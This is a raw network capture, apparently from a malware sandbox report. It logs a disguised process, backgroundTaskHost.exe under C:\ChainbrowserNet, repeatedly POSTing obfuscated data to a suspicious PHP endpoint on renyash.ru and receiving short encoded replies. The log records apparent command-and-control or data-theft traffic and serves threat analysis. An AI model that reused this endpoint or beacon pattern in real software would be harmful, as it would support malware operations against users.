                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d0958fe8c1b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8362&min_rtt=1895&rtt_var=13644&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=27223&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          33192.168.2.449853104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:12.507492065 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          34192.168.2.449854104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:12.567403078 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1820
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:12.920491934 CET1820OUTData Raw: 54 58 5b 57 50 58 5a 51 5c 5b 52 58 57 5c 58 5f 58 5c 5a 5b 52 51 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[WPXZQ\[RXW\X_X\Z[RQQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)7B#8"&(*,9[5'+Q49(, +% 7%*!Y#!Y,>
                                                                                          Jan 4, 2025 11:08:13.040081024 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:13.309133053 CET958INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:13 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=38sdXtXbjFXp7lVbmNAGy3hbw76BwpoHQiPfJo%2FbecEzr0XyteER%2F1uwNEFKUu6KwXsrfN2Ub7LKNYswPu3p2Fr7mMc%2BO5xjx6SvMV1q%2F2Lem%2B9RMVjJvprAEJUArHRTTBX6CmYf"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d112d3e7c84-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7792&min_rtt=2008&rtt_var=12321&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2137&delivery_rate=30239&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 55 28 3e 0d 08 35 06 24 12 2b 3d 2e 1d 31 30 28 1c 2e 21 01 5d 20 2f 2c 06 38 0b 39 5a 27 23 20 14 2b 3c 23 08 34 33 3f 54 24 0a 2a 5d 06 12 38 5b 2b 02 26 10 26 38 22 56 3e 0b 3a 06 26 26 0b 07 30 04 30 05 28 3c 22 02 25 3c 14 0f 3d 11 2a 59 3a 04 2c 0b 3b 12 06 55 36 13 21 53 08 13 20 50 26 57 20 0f 3d 33 36 04 31 30 21 13 27 3a 20 08 2a 28 02 51 27 00 29 07 3a 08 24 03 3f 33 3b 02 3a 10 05 04 3f 2e 0d 1f 27 06 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$U(>5$+=.10(.!] /,89Z'# +<#43?T$*]8[+&&8"V>:&&00(<"%<=*Y:,;U6!S P&W =3610!': *(Q'):$?3;:?.'"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          35192.168.2.449860104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:12.706046104 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:13.060914993 CET2520OUTData Raw: 54 5e 5e 52 50 5f 5a 55 5c 5b 52 58 57 5b 58 5a 58 53 5a 59 52 52 51 58 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^^RP_ZU\[RXW[XZXSZYRRQX^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-(*+C (=P2#()<&#>*'>7Q 6(/3_(6Z#=&>;!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:13.158056021 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:13.419574976 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:13 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S0GWypf0uML%2FbZfZBrurs%2FPQ%2FL7Hjknn3EgF7aKqqtX26aPOOG7iK0DzrQxfFgPbYc7wEb3poME2OmDyQIfgtku8EqK8eTGLAkCnY2EnaERkwcOZNQ61We%2FG9yCbcMPGO%2BUpVqfc"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d11fb9a42f4-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4017&min_rtt=1749&rtt_var=5192&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=73392&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          36192.168.2.449866104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:13.566013098 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:13.920480013 CET2520OUTData Raw: 54 50 5e 51 55 52 5f 54 5c 5b 52 58 57 5f 58 5b 58 53 5a 52 52 56 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TP^QUR_T\[RXW_X[XSZRRVQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)*0#(%U'_>?%Z!->'.$4-=)/8*&7.:X)!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:14.026065111 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:14.481647015 CET805INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:14 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q5VWBZXFkxZruVBxjbh%2Bp8AT2No33YY1AvbbmH14kg76KEHCM0Zm6nFkVdTVOKz1F0KXnTd1LC%2B3WXGDioJTB%2BhiglIM8RnUqpkT9Ndf27xfCXFBOSHc7z9sQgtlKZ1hVbpKvxxZ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d1758654380-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3067&min_rtt=1702&rtt_var=3369&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=115643&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0
                                                                                          Jan 4, 2025 11:08:14.514014006 CET805INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:14 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q5VWBZXFkxZruVBxjbh%2Bp8AT2No33YY1AvbbmH14kg76KEHCM0Zm6nFkVdTVOKz1F0KXnTd1LC%2B3WXGDioJTB%2BhiglIM8RnUqpkT9Ndf27xfCXFBOSHc7z9sQgtlKZ1hVbpKvxxZ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d1758654380-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3067&min_rtt=1702&rtt_var=3369&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=115643&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          37192.168.2.449872104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:14.644136906 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:14.999784946 CET2520OUTData Raw: 54 5a 5e 52 55 53 5a 5d 5c 5b 52 58 57 5e 58 5d 58 57 5a 5a 52 5d 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^RUSZ]\[RXW^X]XWZZR]Q\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z->C (6%3()"5=3> "?;^+[7=*!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:15.107834101 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:15.376902103 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:15 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xcCikGrjVLT08I%2FNXIsm9QNNrklbtlCniw8fYnlwQK%2FECL65PpwXUmM7oPde%2BIAf3rIplYsJ18N2l9Sgz73K8rYoY%2FDNFaWJykEmr2rabVxdYiV4g266kpgPbRta9ACPs8kO7T1Y"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d1e190d4261-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5405&min_rtt=2449&rtt_var=6832&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=55930&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          38192.168.2.449873104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:15.511934996 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:15.857892990 CET2520OUTData Raw: 51 5e 5b 54 55 5f 5f 53 5c 5b 52 58 57 5b 58 52 58 54 5a 53 52 57 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^[TU__S\[RXW[XRXTZSRWQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*$79T&#Y>?1Y6=6$.'7<?<(?[#-=;!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:15.971457958 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:16.228559971 CET812INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zC05Fc85xsl745%2FVj6Hj2uVxtG9SMm7tfD8AP8npxPEjAJBQqcRC%2FreuVtEfA5gbD%2Fil%2FBsOfLJqMUrYlk0%2Fx6itXypz9x7nFsxE4y%2FjR3eU%2FyVLJC94CbDpgcgA9OGTuOgZhVih"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d238edc8c90-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6247&min_rtt=1944&rtt_var=9335&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=40145&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          39192.168.2.449883104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:16.423849106 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:16.779786110 CET2520OUTData Raw: 54 59 5e 5f 50 5f 5a 5c 5c 5b 52 58 57 5b 58 52 58 52 5a 5c 52 54 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^_P_Z\\[RXW[XRXRZ\RTQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.()? 8%7>Z6!-10S#-)/3^<&7 *_*+!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:16.900089025 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:17.162370920 CET798INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iDw0MoCTTFJwsrvLzZZmjLjyAsL9d4YhLMtAiUmBOFL6k80amBPq4BBOFkoMWVHdSGper4PEw2HlAvRgnj4U6gfsOP3FYTj32kigAqVQ77rLgNZaI0k0oS7u4pdi7x5r02cvGLDw"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d294cbe6a5b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3659&min_rtt=1836&rtt_var=4334&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=88910&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          40192.168.2.449891104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:17.311067104 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:17.670327902 CET2520OUTData Raw: 51 59 5e 53 55 53 5a 5c 5c 5b 52 58 57 5d 58 5c 58 51 5a 53 52 52 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^SUSZ\\[RXW]X\XQZSRRQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)+7;9&?>)Z">"'? -"Q<<?< ==*!Y#!Y,
                                                                                          Jan 4, 2025 11:08:17.766654015 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:18.032565117 CET811INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xhVvU6SbUSoxxBRUG7vVipKix42uLvz4TKPP70Ii9PcDrNvO6S%2FgwFr2W0dMYcQlps2r954QjM5%2BqTRj%2Bw3JUP2QW9Hd%2Bl76VKgYOWEnecwHtG68NICY%2BCKGvm2vdgw2OLvRhx%2Fo"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d2ec95119bb-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8258&min_rtt=1934&rtt_var=13374&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=27793&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          41192.168.2.449897104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:18.163480043 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          42192.168.2.449898104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:18.335309029 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:18.685995102 CET1844OUTData Raw: 54 5f 5e 5f 55 5a 5a 53 5c 5b 52 58 57 5f 58 5f 58 53 5a 5a 52 51 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_^_UZZS\[RXW_X_XSZZRQQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*411<*,!!=9'.4."P)?/\?5;Z4=*+;!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:18.761543989 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:18.973823071 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:18.990113974 CET961INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:18 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pqs39bpmhnTYl%2BzXNbfXzE%2FdFXyIS1Av24E6nCiVN37226yCxQP%2Ba2nHllrLzZuxs4xhmxX%2F673qHlmxyROTOM6Hb%2FxRORff%2FnBXzf0Bs9LOoziZ13OFoAW%2BWrebB52I52Wgsm6U"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d34f8ce43d5-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3753&min_rtt=1722&rtt_var=4708&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=81228&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
